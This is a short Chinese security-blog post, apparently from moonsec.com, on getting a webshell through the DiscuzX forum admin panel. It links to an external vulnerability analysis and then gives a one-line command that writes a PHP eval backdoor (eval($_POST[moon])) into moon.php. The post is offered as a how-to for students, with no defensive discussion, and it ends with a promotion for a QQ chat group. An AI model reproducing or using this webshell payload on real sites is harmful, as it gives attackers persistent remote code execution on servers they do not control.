DiscuzX系列后台GETSHELL附方法
作者 mOon www.moonsec.com
最近不少学员来问道 dzx 后台怎么拿WEBSHELL。
最近刚好有个洞洞,不过很多人还是不知道噢,因为很多论坛没有公布具体方法。
wooyun知识库发了恩多Dx的洞洞分析
http://drops.wooyun.org/papers/4611
。。。。。。。。。。。。。。。。。。。
既然可以执行命令。基本上可以拿SHELL
但是有一定的局限。iis基本没权限
拿webshell方法、如下
echo '^<?php eval($_POST[moon]);?^>' >moon.php&
没加群的同学记得加群咯。
点击链接加入群【暗月信息安全交流群】:http://jq.qq.com/?_wv=1027&k=XO2uoK
QQ群 131634501 群里有妹子噢
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论